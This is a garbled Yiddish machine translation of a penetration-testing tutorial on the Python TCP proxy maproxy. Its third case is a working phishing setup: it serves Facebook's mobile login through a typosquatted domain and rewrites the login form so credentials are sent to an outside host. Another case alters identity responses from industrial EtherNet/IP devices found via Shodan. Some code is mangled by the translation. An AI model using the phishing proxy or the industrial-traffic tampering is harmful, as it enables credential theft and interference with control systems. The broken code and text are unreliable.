פּראָצעס נעץ דאַטן אויף די פליען

די איבערזעצונג פון דעם אַרטיקל איז געווען צוגעגרייט אויף די ערעוו פון די אָנהייב פון די קורס “פּענטעסט. דורכדרונג טעסטינג פיר".

אַנאָטאַציע

א פאַרשיידנקייַט פון טייפּס פון זיכערהייט אַסעסמאַנץ, ריינדזשינג פון רעגולער דורכדרונג טעסטינג און רעד מאַנשאַפֿט אַפּעריישאַנז צו כאַקינג IoT/ICS דעוויסעס און SCADA, ינוואַלווז ארבעטן מיט ביינערי נעץ פּראָטאָקאָלס, דאָס איז, בייסיקלי ינטערסעפּטינג און מאָדיפיצירן נעץ דאַטן צווישן דעם קליענט און די ציל. סניפינג נעץ פאַרקער איז נישט אַ שווער אַרבעט זינט מיר האָבן מכשירים ווי Wireshark, Tcpdump אָדער Scapy, אָבער מאָדיפיקאַטיאָן סימז צו זיין אַ מער אַרבעט-אינטענסיווע אַרבעט זינט מיר דאַרפֿן צו האָבן אַ מין פון צובינד צו לייענען די נעץ דאַטן, פילטער עס, טוישן. עס אויף די פליען און שיקן עס צוריק צו דער ציל באַלעבאָס אין כּמעט פאַקטיש צייט. אין אַדישאַן, עס וואָלט זיין ידעאַל אויב אַזאַ אַ געצייַג קען אויטאָמאַטיש אַרבעטן מיט קייפל פּאַראַלעל קאַנעקשאַנז און זיין קוסטאָמיזאַבלע ניצן סקריפּס.

איין טאָג איך דיסקאַווערד אַ געצייַג גערופן maproxy, די דאַקיומענטיישאַן געשווינד געמאכט עס קלאָר צו מיר אַז maproxy - פּונקט וואָס איך דאַרפֿן. דאָס איז אַ פערלי פּשוט, ווערסאַטאַל און לייכט קאַנפיגיעראַבאַל TCP פראקסי. איך טעסטעד דעם געצייַג אויף עטלעכע פערלי קאָמפּלעקס אַפּלאַקיישאַנז, אַרייַנגערעכנט ICS דעוויסעס (וואָס דזשענערייט אַ פּלאַץ פון פּאַקיץ) צו זען אויב עס קען שעפּן פילע פּאַראַלעל קאַנעקשאַנז, און די געצייַג איז געווען גוט.

דער אַרטיקל וועט באַקענען איר צו פּראַסעסינג נעץ דאַטן אויף די פליען ניצן maproxy.

אָפּשאַצונג

קיילע maproxy איז באזירט אויף טאָרנאַדאָ, אַ פאָלקס און דערוואַקסן ייסינגקראַנאַס נעטוואָרקינג פריימווערק אין פּיטהאָן.

אין אַלגעמיין, עס קענען אַרבעטן אין עטלעכע מאָדעס:

• TCP:TCP - אַנענקריפּטיד TCP קאַנעקשאַנז;
• TCP:SSL и SSL:TCP - מיט איין-וועג ענקריפּשאַן;
• SSL:SSL - צוויי-וועג ענקריפּשאַן.

עס קומט ווי אַ ביבליאָטעק. פֿאַר אַ שנעל אָנהייב, איר קענען נוצן ביישפילן טעקעס וואָס פאַרטראַכטנ זיך די הויפּט ביבליאָטעק פאַנגקשאַנז:

• all.py
• certificate.pem
• logging_proxy.py
• privatekey.pem
• ssl2ssl.py
• ssl2tcp.py
• tcp2ssl.py
• tcp2tcp.py

פאַל 1 - פּשוט ביידירעקטיאָנאַל פּראַקסי

באזירט אויף tcp2tcp.py:

#!/usr/bin/env python

import tornado.ioloop
import maproxy.proxyserver

server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
tornado.ioloop.IOLoop.instance().start()

דורך פעליקייַט ProxyServer() נעמט צוויי אַרגומענטן - די קשר אָרט און די ציל פּאָרט. server.listen() נעמט איין אַרגומענט - די פּאָרט פֿאַר צוגעהערט צו די ינקאַמינג קשר.

עקסאַקיוטינג די שריפט:

# python tcp2tcp.py

אין סדר צו לויפן די פּראָבע, מיר וועלן פאַרבינדן צו אַ היגע SSH סערווער דורך אונדזער פּראַקסי שריפט, וואָס ליסאַנז אויף 2222/tcp פּאָרט און קאַנעקץ צו אַ נאָרמאַל פּאָרט 22/tcp SSH סערווערס:

דער באַגריסונג פאָן ינפאָרמז איר אַז אונדזער ביישפּיל שריפט האט הצלחה פּראַקסייד נעץ פאַרקער.

פאַל 2 - דאַטן מאָדיפיקאַטיאָן

אן אנדער דעמאָ שריפט logging_proxy.py ידעאַל פֿאַר ינטעראַקטינג מיט נעץ דאַטן. די באַמערקונגען אין דער טעקע באַשרייַבן די קלאַס מעטהאָדס אַז איר קענען מאָדיפיצירן צו דערגרייכן דיין ציל:

די מערסט טשיקאַווע זאַך איז דאָ:

• on_c2p_done_read - צו ינטערסעפּט דאַטן פון דעם קליענט צו די סערווער;
• on_p2s_done_read - פאַרקערט.

לאָמיר פּרובירן צו טוישן די SSH באַנער אַז דער סערווער קערט צו דעם קליענט:

[…]
def on_p2s_done_read(self,data):
data = data.replace("OpenSSH", "DumnySSH")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
[…]

ויספירן דעם שריפט:

ווי איר קענען זען, דער קליענט איז געווען פאַרפירן ווייַל די SSH סערווער נאָמען פֿאַר אים איז געביטן צו «DumnySSH».

פאַל 3 - פּשוט פישינג וועב בלאַט

עס זענען סאָף וועגן צו נוצן דעם געצייַג. דאָס מאָל לאָזן אונדז פאָקוס אויף עפּעס מער פּראַקטיש פֿון די רעד מאַנשאַפֿט אַפּעריישאַנז זייַט. לאָמיר נאָכמאַכן די לאַנדינג בלאַט m.facebook.com און נוצן אַ מנהג פעלד מיט אַ דיליבראַט טיפּאָ, למשל, m.facebok.com. פֿאַר דעמאַנסטריישאַן צוועקן, לאָזן אונדז נאָר יבערנעמען אַז די פעלד איז רעגיסטרירט דורך אונדז.

מיר וועלן פאַרלייגן אַן אַנענקריפּטיד נעץ פֿאַרבינדונג מיט אונדזער וויקטימס פּראַקסי און ססל סטרים צו די Facebook סערווער (31.13.81.36). צו מאַכן דעם בייַשפּיל אַרבעט, מיר דאַרפֿן צו פאַרבייַטן די הטטפּ באַלעבאָס כעדער און אַרייַנשפּריצן די ריכטיק האָסטנאַמע, און מיר וועלן אויך דיסייבאַל ענטפער קאַמפּרעשאַן אַזוי מיר קענען לייכט אַקסעס די אינהאַלט. לעסאָף, מיר וועלן פאַרבייַטן די HTML פאָרעם אַזוי אַז די לאָגין קראַדענטשאַלז זענען געשיקט צו אונדז אַנשטאָט פון פאַסעבאָאָק סערווערס:

[…]
def on_c2p_done_read(self,data):
 # replace Host header
data = data.replace("Host: m.facebok.com", "Host: m.facebook.com")
# disable compression
data = data.replace("gzip", "identity;q=0")
data = data.replace("deflate", "")
super(LoggingSession,self).on_c2p_done_read(data)
[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response
     data = data.replace("action="/yi/login/", "action="https://redteam.pl/")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("31.13.81.36",443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]

אין קיצער:

ווי איר קענען זען, מיר זענען הצלחה ביכולת צו פאַרבייַטן די אָריגינעל פּלאַץ.

פאַל 4 - פּאָרטינג עטהערנעט / IP

איך האָבן שוין דילינג מיט ינדאַסטריאַל דעוויסעס און ווייכווארג (ICS / SCADA) פֿאַר גאַנץ עטלעכע מאָל, אַזאַ ווי פּראָוגראַמאַבאַל קאַנטראָולערז (פּלק), י / אָ מאַדזשולז, דרייווז, רילייז, לייטער פּראָגראַממינג ינווייראַנמאַנץ און פילע מער. דער פאַל איז פֿאַר די וואס ווי ינדאַסטרי. כאַקינג אַזאַ סאַלושאַנז ינוואַלווז אַקטיוולי פּלייינג מיט נעץ פּראָטאָקאָלס. אין די פאלגענדע בייַשפּיל, איך וואָלט ווי צו ווייַזן ווי איר קענען מאָדיפיצירן ICS / SCADA נעץ פאַרקער.

פֿאַר דעם איר וועט דאַרפֿן די פאלגענדע:

• נעץ סניפער, פֿאַר בייַשפּיל, Wireshark;
• עטהערנעט / IP אָדער נאָר אַ זופּן מיטל, איר קענען געפֿינען עס מיט די Shodan דינסט;
• אונדזער שריפט איז באזירט אויף maproxy.

ערשטער, לאָמיר קוק ווי אַ טיפּיש לעגיטימאַציע ענטפער פון CIP (Common Industrial Protocol) קוקט ווי:

מיטל לעגיטימאַציע איז דורכגעקאָכט מיט די עטהערנעט / IP פּראָטאָקאָל, וואָס איז אַ ענכאַנסט ווערסיע פון ​​​​די ינדאַסטריאַל עטהערנעט פּראָטאָקאָל וואָס ראַפּס קאָנטראָל פּראָטאָקאָלס אַזאַ ווי CIP. מיר וועלן טוישן די כיילייטיד שייַן נאָמען וואָס איז קענטיק אין די סקרעענשאָט "NI-IndComm פֿאַר עטהערנעט" ניצן אונדזער פּראַקסי שריפט. מיר קענען ווידער נוצן דעם שריפט logging_proxy.py און סימילאַרלי מאָדיפיצירן די קלאַס אופֿן on_p2s_done_read, ווייַל מיר וועלן אַז אַ אַנדערש אידענטיטעט נאָמען זאָל זיין קענטיק אויף דעם קליענט.

קאָד:

[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response

 # Checking if we got List Identity message response
     if data[26:28] == b'x0cx00':
         print('Got response, replacing')
         data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
     super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("1.3.3.7",44818,session_factory=LoggingSessionFactory())
server.listen(44818)
[…]

יסענשאַלי, מיר געבעטן פֿאַר מיטל לעגיטימאַציע צוויי מאָל, די רגע ענטפער איז געווען דער אָריגינעל, און דער ערשטער איז מאַדאַפייד אויף די פליען.

און די לעצטע

אין מיין מיינונג maproxy א באַקוועם און פּשוט געצייַג, וואָס איז אויך געשריבן אין פּיטהאָן, אַזוי איך גלויבן אַז איר אויך קענען נוץ פון ניצן עס. פון קורס, עס זענען מער קאָמפּליצירט מכשירים פֿאַר פּראַסעסינג און מאַדאַפייינג נעץ דאַטן, אָבער זיי אויך דאַרפן מער ופמערקזאַמקייט און זענען יוזשאַוואַלי באשאפן פֿאַר אַ ספּעציפיש נוצן פאַל, למשל. מוראַענאַ, מאָדישקאַ אָדער עווילגינקס פֿאַר קאַסעס ענלעך צו די דריט, אָדער canape פֿאַר די לעצטע פאַל. איין וועג אָדער אנדערן, מיט די הילף maproxy איר קענען געשווינד ינסטרומענט דיין יידיאַז פֿאַר ינטערסעפּטינג נעץ דאַטן, ווייַל די ביישפּיל סקריפּס זענען זייער קלאָר.

טעסטינג אָטענטאַקיישאַן מעקאַניזאַמז אין Windows AD

מקור: www.habr.com